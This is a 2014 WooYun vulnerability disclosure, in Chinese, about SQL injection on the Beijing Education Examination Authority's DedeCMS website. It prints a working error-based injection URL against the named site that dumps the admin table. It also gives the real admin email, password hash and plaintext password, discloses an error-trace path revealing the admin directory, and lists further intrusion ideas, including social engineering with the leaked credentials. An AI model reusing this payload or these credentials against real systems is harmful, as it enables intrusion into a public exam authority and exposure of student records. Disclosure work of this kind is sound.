当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082322

漏洞标题:北京教育考试院主站SQL注入漏洞泄露管理员账号密码

相关厂商:北京教育考试院

漏洞作者: Coffee

提交时间:2014-11-07 13:04

修复时间:2014-12-22 13:10

公开时间:2014-12-22 13:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-11: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向核心白帽子及相关领域专家公开
2014-12-01: 细节向普通白帽子公开
2014-12-11: 细节向实习白帽子公开
2014-12-22: 细节向公众公开

简要描述:

今天老师讲高考报名的事,回家就顺便测试了一下报名的网站~
这么重要的网站,还是主站,全北京中学生的志愿数据、录取数据、考生信息都在这,好歹重视一下安全嘛,否则出了问题就是重大事故了。
“北京教育考试院(BJEEA)成立于1996年,隶属于北京市教育委员会,是负责北京地区各级各类教育考试管理和研究工作的专业化机构,同时,承担一些全国教育考试项目。北京教育考试院的主要任务包括:试题命制、考试管理、考试测评及招生录取”

详细说明:

网站使用Dedecms,版本过低:
#1、版本号
http://www.bjeea.cn/data/admin/ver.txt
==>20091028
#2、管理员账号密码

管理员.jpg


http://search.bjeea.cn/plus/search.php?keyword=as&typeArr[111%3D@`\%27`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\%27`+]=a
==>yangt@bjeea.cn
==>a86a29b9a99f74ab,明文:bjeea888
#3、后台路径
http://www.bjeea.cn/data/mysql_error_trace.inc
==>/bjeeadede2009/
#4、后续
网站做了加固,后台外网500无法访问,猜测是做了限制。
突破思路肯定是有的,比如拿下子站代理访问、Dede老版本前台Shell漏洞、结合泄露邮箱密码进一步社工,高三党比较忙就不继续渗透了,再继续下去怕是会出危险……
不过对于这么老的版本,网上已经披露了大量高危漏洞,足以对服务器、数据安全造成威胁。

漏洞证明:

http://www.bjeea.cn/plus/search.php?keyword=as&typeArr[111%3D@`\%27`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\%27`+]=a
==>yangt@bjeea.cn
==>a86a29b9a99f74ab,明文:bjeea888

修复方案:

#1、升级Dedecms版本。
#2、还是那句话,既然这里的数据那么重要,请重视一下安全,对考生负责。

版权声明:转载请注明来源 Coffee@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-11-11 14:01

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-08 12:17 | Haswell ( 普通白帽子 | Rank:167 漏洞数:18 | HorizonSec @ RDFZ)

    前排沙发

  2. 2015-03-03 15:46 | 我是一只小鸭子 ( 路人 | Rank:12 漏洞数:2 | 想好再写)

    竟然不修复